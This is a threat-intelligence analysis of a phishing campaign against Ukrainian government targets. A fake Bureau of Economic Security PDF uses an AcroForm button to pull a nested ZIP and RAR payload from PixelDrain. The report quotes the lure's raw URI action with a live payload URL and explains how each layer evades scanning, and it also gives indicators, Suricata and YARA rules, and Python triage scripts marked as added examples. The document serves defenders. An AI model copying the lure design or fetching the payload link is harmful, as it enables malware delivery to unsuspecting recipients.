A Fake Ukrainian Government Order, a PixelDrain Link, and a Matryoshka of Archives: Dissecting the BES Lure Campaign
TL;DR: A live phishing campaign targeting Ukrainian entities was caught using a PDF lure impersonating the Bureau of Economic Security of Ukraine (BES). The document -- a single PNG image dressed up as an official government order -- contains an AcroForm button that silently directs the victim's browser to a PixelDrain-hosted payload. That payload is a 26MB nested archive chain (ZIP > RAR > password-protected RAR with encrypted headers) designed to defeat every layer of automated scanning. The PDF has 0/76 AV detections on VirusTotal. The payload was still live at time of analysis, with only 2 downloads recorded. MalwareBazaar pivot analysis ties this sample to a broader campaign cluster exploiting CVE-2025-8088 (WinRAR), using LNK, HTML, and RAR lures across military and government themes -- overlapping with the UAC-0252 threat cluster tracked by CERT-UA. The final payload remains unknown: the innermost RAR uses encrypted headers and a password that was likely communicated in the phishing email body, which was not recovered.
The Lure That Looked Like Paperwork
If you work in Ukrainian government finance, you open PDFs from the Bureau of Economic Security. That is your job. And that is what makes this campaign effective.
The file arrives with a name engineered to look like bureaucratic routine: Elektronna_forma_Biuro_ekonomichnoi_bezpeky_Ukrainy_vid_11.03.2026_vkhid_1921755727.pdf. Translated: "Electronic form of the Bureau of Economic Security of Ukraine dated 11.03.2026, incoming no. 1921755727." It is the kind of filename that a government worker would open without a second thought.
Inside, the victim sees what appears to be Order No. 34, dated 23 February 2026, from the Bureau of Economic Security -- complete with the official BES logo, letterhead, contact details, and a blue "Download Form" button at the bottom. The Ukrainian text is natural, not machine-translated. The formatting mirrors real BES documents. Whoever built this lure knows how Ukrainian government correspondence looks.
But the entire document is a lie. It is a single PNG image (1098x1552 pixels) converted to PDF using PDF-XChange Editor. The "Download Form" button is not part of the image -- it is an AcroForm widget laid on top, wired to a URI action that opens the victim's browser to a PixelDrain download link.
No JavaScript. No macros. No exploit. Just a button and a URL.
How the Delivery Chain Works
```text
[Phishing Email]
  Suspected email delivery (original not recovered)
        |
        v
[Stage 1: PDF Lure]
  Elektronna_forma_...vid_11.03.2026_vkhid_1921755727.pdf
  Image-based fake BES order with AcroForm button
  /A << /S /URI /URI (https://pixeldrain.com/api/file/ZdQa4vA7) >>
  /FT /Btn /Subtype /Widget
        |
        v (victim clicks "Download Form")
[Stage 2: PixelDrain Payload]
  hxxps://pixeldrain[.]com/api/file/ZdQa4vA7
  Filename: Електронна форма Бюро економічної безпеки України №_3495.zip
  26.2 MB ZIP archive
        |
        v
[Stage 3: First RAR Layer]
  RAR5 (Solid, Locked)
  26.2 MB
        |
        v
[Stage 4: Second RAR Layer]
  RAR5 (Solid, Locked, Encrypted Headers)
  Password-protected -- password not recovered
        |
        v
[UNKNOWN FINAL PAYLOAD]
```
The chain is deliberate. Each nesting layer defeats a different defensive control:
- The PDF bypasses email content filtering -- no macros, no JavaScript, no exploit code. Just a URI action on a form button, which most PDF scanners ignore.
- PixelDrain bypasses reputation-based URL filtering -- it is a legitimate Dutch file hosting service with a clean domain reputation.
- The outer ZIP bypasses file type restrictions that block RAR attachments directly.
- The first RAR adds another extraction step that automated sandboxes must handle correctly.
- The inner RAR with encrypted headers defeats everything. Password-protected archives with encrypted headers cannot be scanned by any gateway, sandbox, or AV engine without the password. And that password lives in the phishing email body, which the scanner never sees.
The PDF Under the Hood
The metadata tells a story about the operator:
| Field | Value | Significance |
|---|---|---|
| Creator Tool | PDF-XChange Editor 10.7.2.400 | Commercial editor, commonly pirated in CIS region |
| Producer | PDF-XChange Core API SDK (10.7.2.400) | SDK version matches -- not a cracked export |
| Creation Time | 2026-03-10T23:47:08+03:00 | Late night, UTC+3 timezone |
| Modification Time | 2026-03-10T23:47:38+03:00 | 30 seconds later -- quick edit |
| Original Title | 1.png | Document started as a screenshot |
| Document UUID | c3a0db3e-3824-4298-91ba-38af423e8244 | Unique tracking artifact |
| AcroForm Font | Helvetica-Bold | Button text styling |
| Button Label | Завантажити (Download) | Ukrainian language |
The UTC+3 timezone is the first attribution breadcrumb. Eastern European Time covers Ukraine, Moldova, Romania, Belarus, and western Russia. The document was created at 11:47 PM local time -- someone was working late on March 10, and the payload was uploaded to PixelDrain six hours earlier at 17:36 UTC. The 30-second gap between creation and modification times suggests the operator created the PDF from the PNG, immediately added the AcroForm button with the PixelDrain link, and saved.
The 1.png original title is telling. This was not a document built from scratch in a word processor. Someone took a screenshot or designed an image of a fake BES order, then wrapped it in a PDF with a clickable button overlaid. It is a template approach -- swap the image, update the button URL, and you have a new lure in under a minute.
PixelDrain: The Unwitting Accomplice
The payload URL points to PixelDrain's file API:
hxxps://pixeldrain[.]com/api/file/ZdQa4vA7
PixelDrain is a legitimate file hosting service based in the Netherlands. It is not malicious infrastructure -- it is abused infrastructure. The distinction matters for defenders: blocking pixeldrain.com entirely may cause collateral damage, but blocking this specific file endpoint is surgical and safe.
At the time of automated analysis, the payload was confirmed live through three independent verification methods:
- PDF stream decompression -- extracting the URL directly from the AcroForm action
- PixelDrain Info API -- querying /api/file/ZdQa4vA7/info returned file metadata
- HTTP HEAD request -- confirmed the file was downloadable with correct Content-Length
The file had been downloaded only twice at time of analysis. Either the campaign was extremely targeted (a handful of specific recipients), or it had just begun and was caught early.
| PixelDrain Metadata | Value |
|---|---|
| File ID | ZdQa4vA7 |
| Filename | Електронна форма Бюро економічної безпеки України №_3495.zip |
| Size | 26,244,456 bytes (26.2 MB) |
| Upload Date | 2026-03-10T17:36:34.505Z |
| Downloads | 2 |
| MIME Type | application/zip |
| Hosting IPs | 160[.]202[.]167[.]162-164 |
| ASN | AS137409 (GSL Networks / Keystone) |
The Matryoshka: Three Archives Deep
The 26.2MB ZIP downloaded from PixelDrain contains a RAR archive, which contains another RAR archive. The nesting is not accidental -- it is a well-documented evasion pattern used by Eastern European threat actors, particularly those targeting Ukraine.
| Layer | Type | SHA256 | Size | Protection |
|---|---|---|---|---|
| Outer | ZIP | 0f93906c5198a0cefa9671506c0042ec... | 26.2 MB | None |
| Inner 1 | RAR5 | 1c7c41c81951771b7f9af2491e9c898e... | 26.2 MB | Solid, Locked |
| Inner 2 | RAR5 | 9edd7dbcafdb8fe9ac1d6b92ac4cbd42... | 26.2 MB | Solid, Locked, Encrypted Headers |
The innermost RAR uses encrypted headers, which means you cannot even see the filenames inside without the password. This is a step beyond simple password protection -- it prevents any form of metadata-based detection. An email gateway scanning this archive chain would see: a ZIP containing a RAR containing... nothing it can read.
The password was not recovered during this investigation. It was almost certainly communicated in the body of the phishing email ("Use password: XXXX to open the form"), which was not available for analysis. This is a common pattern: split the credential from the payload so that no single artifact contains both.
The consistent 26.2 MB size across all three layers indicates minimal compression overhead -- the actual payload data is approximately the same size regardless of which container you measure.
What Was Found vs. What Was Known
| Aspect | Prior Public Reporting | This Investigation |
|---|---|---|
| Delivery format | UKR campaigns use LNK, RAR, HTML, HWP | PDF lure with AcroForm URI action (no JS/macros) |
| Hosting | Actor-controlled infrastructure or compromised sites | PixelDrain legitimate file hosting (abused) |
| Lure theme | Military supply, property reports, cooperation docs | Bureau of Economic Security financial reporting form |
| Archive evasion | Password-protected RAR | Triple-nested ZIP > RAR > encrypted-header RAR |
| CVE exploitation | CVE-2025-8088, CVE-2025-6218 in related samples | Unknown -- final payload not extracted |
| Attribution | UAC-0252 cluster (CERT-UA) | Tactical overlap via MalwareBazaar UKR tag pivot |
| AV detection | Varies | 0/76 on VirusTotal (completely undetected) |
| Malware families | Quakbot, RClone-Stealer-Mega in related UKR samples | Unknown -- encrypted payload not recovered |
| Operator timezone | Eastern Europe assumed | UTC+3 confirmed via PDF metadata |
| Tooling | Various | PDF-XChange Editor 10.7.2.400 (specific version fingerprint) |
The Broader Campaign: UAC-0252 and CVE-2025-8088
This PDF lure does not exist in isolation. A pivot on the UKR tag in MalwareBazaar reveals a coordinated campaign running since at least early March 2026, using multiple file types and exploitation techniques:
| Date | SHA256 (truncated) | Type | Tags/CVEs | Theme |
|---|---|---|---|---|
| 2026-03-11 | ce10df51... | ZIP | UKR | BES Ukraine form (this sample) |
| 2026-03-10 | edc242b4... | RAR | UKR, CVE-2025-8088 | Unknown |
| 2026-03-10 | 4394c347... | HTML | UKR | Unknown lure |
| 2026-03-06 | 14cfadb8... | LNK | UKR | Property report (Dopovid_maino) |
| 2026-03-05 | 8150b2b3... | RAR | UKR, CVE-2025-6218, CVE-2025-8088 | Military supply unit |
| 2026-03-03 | ba149847... | RAR | UKR, UAC-0252, CVE-2025-6218, CVE-2025-8088 | Unknown |
| 2026-03-03 | 27d7a398... | ZIP | UKR, Quakbot, RClone-Stealer-Mega | Algeria-Ukraine cooperation |
Three observations stand out:
First, the operator is versatile. PDF, RAR, LNK, HTML -- four different file types in eight days. This is not a one-trick actor running the same playbook. They are rotating delivery mechanisms, likely testing which formats achieve the best open rates against specific targets.
Second, CVE-2025-8088 (a WinRAR vulnerability) appears in three related samples from March 3-10. The password-protected RAR in our sample may be designed to exploit this same vulnerability during extraction. Without the password, we cannot confirm this -- but the pattern is suggestive.
Third, the March 3 sample tagged UAC-0252 provides a tentative attribution anchor. UAC-0252 is a CERT-UA designation for a Russian-nexus threat cluster targeting Ukrainian government and military organizations. The shared UKR tagging, overlapping timeframe, and consistent government/military lure themes make this overlap worth tracking -- but it is not a confirmed attribution.
Threat Actor Profile
What we know:
- Timezone: UTC+3 (confirmed via PDF creation timestamp)
- Language: Native or near-native Ukrainian (natural phrasing in lure, correct government terminology)
- Government knowledge: Accurate impersonation of BES document format, including logo, letterhead, and contact details
- OPSEC awareness: Image-based PDF (no extractable text for content filters), nested encrypted archives, legitimate hosting infrastructure
- Tooling: PDF-XChange Editor 10.7.2.400 -- a commercial Windows PDF editor commonly used in Eastern Europe
What we do not know:
- Final payload: The encrypted RAR's contents remain unknown
- Email vector: The original phishing email was not recovered
- Target list: Only 2 downloads recorded, but scope could be wider
- Direct link to UAC-0252: Overlap is tactical, not technical
Attribution assessment:
LOW confidence link to UAC-0252 / Russian-nexus operations. The assessment is based on shared MalwareBazaar UKR tagging, consistent targeting themes, and temporal overlap -- not on shared infrastructure, code, or C2. The UTC+3 timezone is consistent with both Ukrainian and Russian operators.
Detection
Email Gateway
Block or quarantine PDF attachments that contain:
- /S /URI /URI actions pointing to file hosting services (PixelDrain, GoFile, AnonFiles, Mega, MediaFire)
- AcroForm button widgets (/FT /Btn) with external URI actions
- Ukrainian-language filenames with government entity references
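One way to implement the gateway checks above, written here as an added example rather than code from the original write-up: it scans a PDF for an AcroForm button widget carrying a URI action to a file-hosting domain, and inflates FlateDecode streams first, because editors such as PDF-XChange store annotation dictionaries inside compressed object streams, where a raw-byte string match (the approach of the YARA rule further down) never sees the URL. The file-hosting list, the sample PDFs and the file ID EXAMPLE1 are constructed for the demonstration.

```python
import re
import zlib

# File-hosting domains from the gateway guidance above (constructed list, extend as needed).
FILE_HOSTS = ("pixeldrain.com", "gofile.io", "anonfiles.com", "mega.nz", "mediafire.com")
URI_STRING = re.compile(rb"/URI\s*\(([^)]*)\)")   # the /URI (...) value of a URI action
STREAM_BODY = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)

def inflate_streams(pdf: bytes) -> bytes:
    """Return the raw file plus the inflated body of every stream that is valid
    zlib data. Editors such as PDF-XChange keep annotation dictionaries inside
    FlateDecode object streams, so a raw-byte string scan alone misses them."""
    inflated = []
    for m in STREAM_BODY.finditer(pdf):
        try:
            inflated.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass                    # image data or another filter: nothing to inflate
    return b"\n".join([pdf, *inflated])

def scan_pdf(pdf: bytes) -> dict:
    """Flag the lure shape on this page: an AcroForm button whose URI action
    points at a file-hosting service, with no JavaScript or macros involved."""
    data = inflate_streams(pdf)
    uris = [u.decode("latin-1") for u in URI_STRING.findall(data)]
    hosted = [u for u in uris if any(h in u.lower() for h in FILE_HOSTS)]
    return {"acroform": b"/AcroForm" in data,
            "button_uri_action": b"/FT /Btn" in data and b"/S /URI" in data,
            "uris": uris, "file_host_uris": hosted,
            "verdict": "quarantine" if hosted else "allow"}

def raw_scan_sees_uri(pdf: bytes) -> bool:
    """What a string-only rule sees: a hit only when the dictionary is uncompressed."""
    return URI_STRING.search(pdf) is not None

def build_sample_pdf(uri: bytes, compress: bool) -> bytes:
    """Constructed minimal PDF: an AcroForm button widget whose /A action is a
    URI. With compress=True the widget sits in a FlateDecode object stream."""
    widget = (b"<< /Type /Annot /Subtype /Widget /FT /Btn /T (Download) "
              b"/A << /S /URI /URI (" + uri + b") >> >>")
    if compress:
        body = zlib.compress(b"5 0 " + widget)
        obj = (b"6 0 obj << /Type /ObjStm /N 1 /First 4 /Length %d /Filter /FlateDecode >>\n"
               b"stream\n" % len(body) + body + b"\nendstream\nendobj\n")
    else:
        obj = b"5 0 obj " + widget + b" endobj\n"
    return (b"%PDF-1.7\n1 0 obj << /Type /Catalog /AcroForm << /Fields [5 0 R] >> >> endobj\n"
            + obj + b"%%EOF\n")
```

Run `scan_pdf` over the compressed sample and `raw_scan_sees_uri` over the same bytes to see the difference: the string-only scan returns False while the inflating scan still quarantines.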
Network
Deploy the following Suricata signatures to detect payload delivery:
```suricata
# Detect PixelDrain API file downloads (broad)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"BREAKGLASS UKR-Lure PixelDrain Payload Download"; \
    flow:established,to_server; \
    http.host; content:"pixeldrain.com"; \
    http.uri; content:"/api/file/"; startswith; \
    classtype:trojan-activity; \
    sid:2026031101; rev:1; \
)

# Detect specific campaign payload (surgical)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"BREAKGLASS UKR-Lure PixelDrain Specific Payload ZdQa4vA7"; \
    flow:established,to_server; \
    http.host; content:"pixeldrain.com"; \
    http.uri; content:"/api/file/ZdQa4vA7"; \
    classtype:trojan-activity; \
    sid:2026031102; rev:1; \
    priority:1; \
)

# Detect PDF files containing PixelDrain links in transit over HTTP
# ("file" is not a Suricata protocol keyword; clone the rule with "smtp" to cover mail)
alert http any any -> any any ( \
    msg:"BREAKGLASS UKR-Lure PDF with PixelDrain Link"; \
    filemagic:"PDF document"; \
    file.data; content:"pixeldrain.com/api/file/"; \
    classtype:trojan-activity; \
    sid:2026031105; rev:1; \
)
```
Endpoint (YARA)
Deploy the following rule to email gateways and file scanning infrastructure:
```yara
rule UKR_Lure_BES_PDF_Stage1
{
    meta:
        description = "Detects Ukrainian BES-themed PDF lure with PixelDrain payload link"
        author = "Breakglass Intelligence"
        date = "2026-03-11"
        hash = "8a4e0ff205d2799ee16e2df1106cb1269be5d4ec131f38560e7e09439a068319"
        severity = "HIGH"
    strings:
        $pdf_header = "%PDF-"
        $pixeldrain_uri = /https?:\/\/pixeldrain\.com\/api\/file\/[A-Za-z0-9_-]{6,12}/ ascii wide
        $pdfxchange = "PDF-XChange" ascii wide
        $acroform = "/AcroForm" ascii
        $uri_action = "/S /URI /URI" ascii
        $btn_widget = "/FT /Btn" ascii
    condition:
        $pdf_header at 0 and
        $pixeldrain_uri and
        ($acroform and $uri_action and $btn_widget)
}
```
Hunting Queries
For organizations with EDR telemetry, hunt for:
- PDF files opened from email clients where the default browser subsequently navigates to pixeldrain.com/api/file/*
- Large ZIP downloads (>25MB) from PixelDrain containing nested RAR archives
- RAR extraction failures (encrypted headers, password prompts) following PDF file opens
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Spearphishing Attachment | T1566.001 | PDF lure delivered via email |
| Execution | User Execution: Malicious File | T1204.002 | Victim clicks "Download Form" button |
| Command and Control | Ingress Tool Transfer | T1105 | Payload downloaded from PixelDrain |
| Defense Evasion | Obfuscated Files or Information | T1027 | Nested archive chain (ZIP > RAR > RAR) |
| Defense Evasion | Masquerading | T1036 | Fake BES government document |
| Defense Evasion | Encrypted/Encoded File | T1027.013 | Password-protected RAR with encrypted headers |
Indicators of Compromise
File Hashes
| Artifact | SHA256 | MD5 |
|---|---|---|
| PDF Lure | 8a4e0ff205d2799ee16e2df1106cb1269be5d4ec131f38560e7e09439a068319 | 836ea9e604640b5eaca414514f4962ce |
| MalwareBazaar ZIP | ce10df51bf1eda48756df2c7c1962d2486d2e25e23695a6f98a82e32281df347 | 9115df1d2f2913ebf21788f6f9469251 |
| Stage 2 ZIP (PixelDrain) | 0f93906c5198a0cefa9671506c0042ec469f55582b048b55dbeaa7932ccd42a3 | -- |
| Stage 2 RAR (layer 1) | 1c7c41c81951771b7f9af2491e9c898eec5e0465862196551865e8cfd702c037 | -- |
| Stage 2 RAR (encrypted) | 9edd7dbcafdb8fe9ac1d6b92ac4cbd42e98d3237f9d500453bedd1418386483e | -- |
Network Indicators
| Indicator | Type | Context |
|---|---|---|
| hxxps://pixeldrain[.]com/api/file/ZdQa4vA7 | URL | Payload download (CONFIRMED live) |
| pixeldrain[.]com | Domain | Legitimate hosting, abused for delivery |
| 160[.]202[.]167[.]162 | IP | PixelDrain infrastructure (legitimate) |
| 160[.]202[.]167[.]163 | IP | PixelDrain infrastructure (legitimate) |
| 160[.]202[.]167[.]164 | IP | PixelDrain infrastructure (legitimate) |
Metadata Indicators
| Indicator | Type | Confidence |
|---|---|---|
| PDF-XChange Editor 10.7.2.400 | Creator Tool | PROBABLE (operator fingerprint) |
| PDF-XChange Core API SDK (10.7.2.400) | Producer | PROBABLE |
| uuid:c3a0db3e-3824-4298-91ba-38af423e8244 | Document UUID | CONFIRMED |
| uuid:a58f2a83-ab65-463c-a016-3e8e70495470 | Instance UUID | CONFIRMED |
| 1.png | Original Title | CONFIRMED (source image) |
Related Campaign Hashes
| SHA256 | Type | Date | Tags |
|---|---|---|---|
| edc242b4... | RAR | 2026-03-10 | UKR, CVE-2025-8088 |
| 4394c347... | HTML | 2026-03-10 | UKR |
| 14cfadb8... | LNK | 2026-03-06 | UKR |
| 8150b2b3... | RAR | 2026-03-05 | UKR, CVE-2025-6218, CVE-2025-8088 |
| ba149847... | RAR | 2026-03-03 | UKR, UAC-0252, CVE-2025-6218, CVE-2025-8088 |
| 27d7a398... | ZIP | 2026-03-03 | UKR, Quakbot, RClone-Stealer-Mega |
What We Could Not Determine
This investigation has real gaps, and they matter:
- The final payload is unknown. The password-protected RAR with encrypted headers could not be extracted. The password was delivered in the phishing email, which was not recovered. This means we cannot confirm the malware family, C2 infrastructure, or post-exploitation behavior.
- No behavioral analysis. VirusTotal sandbox returned no data -- the sample was too fresh. Dynamic analysis platforms could not process the encrypted archive without the password.
- No email headers. The original phishing email was not available, so we cannot determine the sending infrastructure, spoofed headers, or recipient list.
- CVE-2025-8088 exploitation is unconfirmed. Related campaign samples exploit this WinRAR vulnerability, and the nested RAR structure is consistent with that technique, but we cannot confirm it without extracting the final payload.
- Certificate Transparency data was unavailable. crt.sh returned 502 errors during analysis.
These gaps should inform how you prioritize: the IOCs for the PDF lure and PixelDrain delivery are high-confidence and actionable today. The campaign-level attribution to UAC-0252 is speculative and should be treated as a hypothesis to monitor, not a conclusion to act on.
Recommended Actions
Immediate:
1. Block hxxps://pixeldrain[.]com/api/file/ZdQa4vA7 at web proxy / firewall
2. Deploy hash-based blocking for all five SHA256 values in the IOC table
3. Report file ID ZdQa4vA7 to PixelDrain abuse for takedown
4. Deploy YARA and Suricata rules to email gateways and network IDS
Short-term:
5. Hunt for PDF files containing pixeldrain.com/api/file/ strings across email logs and endpoint telemetry
6. Monitor MalwareBazaar UKR tag for new samples from this campaign cluster
7. Track CVE-2025-8088 exploitation in incoming RAR files
8. Brief CERT-UA if this campaign is not already in their tracking
Strategic:
9. Evaluate policies for PDF files with AcroForm URI actions -- these bypass most content scanning
10. Consider restricting or monitoring access to file hosting services (PixelDrain, GoFile, etc.) commonly abused for payload delivery
11. Implement nested archive extraction limits in email gateways -- if an attachment contains more than two archive layers, quarantine it
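The nested-archive limit in the strategic recommendation above, combined with the encrypted-header check described in the Matryoshka section, as an added example that is not part of the original write-up. It unwraps ZIP layers with the standard library, recognises RAR5 by its signature and reads the first header's type to tell an archive encryption header (type 4, filenames unreadable without the password) from a normal main header (type 1); RAR layers are reported but not opened, since that needs an external extractor, so the constructed three-layer sample uses a ZIP as its middle layer. The RAR5 stubs, the nesting policy constant and the sample chain are all constructed.

```python
import io
import zipfile

ZIP_MAGIC, RAR5_MAGIC = b"PK\x03\x04", b"Rar!\x1a\x07\x01\x00"
MAX_LAYERS = 2   # the write-up's gateway policy: more than two archive layers -> quarantine

def read_vint(buf: bytes, pos: int):
    """RAR5 vint: 7 payload bits per byte, high bit set means another byte follows."""
    value, shift = 0, 0
    while buf[pos] & 0x80:
        value |= (buf[pos] & 0x7F) << shift
        pos, shift = pos + 1, shift + 7
    return value | (buf[pos] << shift), pos + 1

def rar5_headers_encrypted(blob: bytes) -> bool:
    """Each RAR5 header is CRC32 + size vint + type vint. Type 4 is the archive
    encryption header: it comes first and every later header (filenames too) is encrypted."""
    _size, pos = read_vint(blob, len(RAR5_MAGIC) + 4)   # skip signature and CRC32
    return read_vint(blob, pos)[0] == 4

def triage(blob: bytes, depth: int = 1) -> dict:
    """Unwrap ZIP layers recursively; RAR layers are recognised but not opened."""
    node = {"layer": depth, "type": "other", "encrypted": False, "children": []}
    if blob.startswith(ZIP_MAGIC):
        node["type"] = "zip"
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x1:        # password-protected entry: opaque
                    node["encrypted"] = True
                else:
                    node["children"].append(triage(zf.read(info), depth + 1))
    elif blob.startswith(RAR5_MAGIC):
        node["type"], node["encrypted"] = "rar5", rar5_headers_encrypted(blob)
    return node

def verdict(blob: bytes):
    """Quarantine on excessive nesting or on any layer that cannot be inspected."""
    reasons, deepest, stack = [], 0, [triage(blob)]
    while stack:
        node = stack.pop()
        if node["type"] != "other":
            deepest = max(deepest, node["layer"])
        if node["encrypted"]:
            reasons.append(f"layer {node['layer']}: {node['type']} with encrypted headers/entries")
        stack.extend(node["children"])
    if deepest > MAX_LAYERS:
        reasons.append(f"{deepest} archive layers exceeds limit of {MAX_LAYERS}")
    return ("quarantine" if reasons else "allow"), reasons

def zip_bytes(name: str, payload: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()

# Constructed RAR5 stand-ins: signature, zero CRC32, then an archive encryption
# header (type 4, dummy salt and check value) or a plain main header (type 1).
RAR5_ENCRYPTED_STUB = RAR5_MAGIC + b"\0\0\0\0" + b"\x21\x04\x00\x00\x01\x0f" + b"\0" * 28
RAR5_PLAIN_STUB = RAR5_MAGIC + b"\0\0\0\0" + b"\x03\x01\x00\x00"
# Constructed three-layer chain with the write-up's shape (middle layer is a ZIP here).
NESTED_SAMPLE = zip_bytes("form.zip", zip_bytes("form.rar", RAR5_ENCRYPTED_STUB))
```

`verdict(NESTED_SAMPLE)` reports both reasons, the third layer's encrypted headers and the depth limit, while a ZIP holding a single plain RAR passes.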
Published by Breakglass Intelligence. Investigation conducted 2026-03-11.
A fake government order. A file hosting link. Three layers of archives. Zero AV detections. And a payload we still cannot see.
Classification: TLP:CLEAR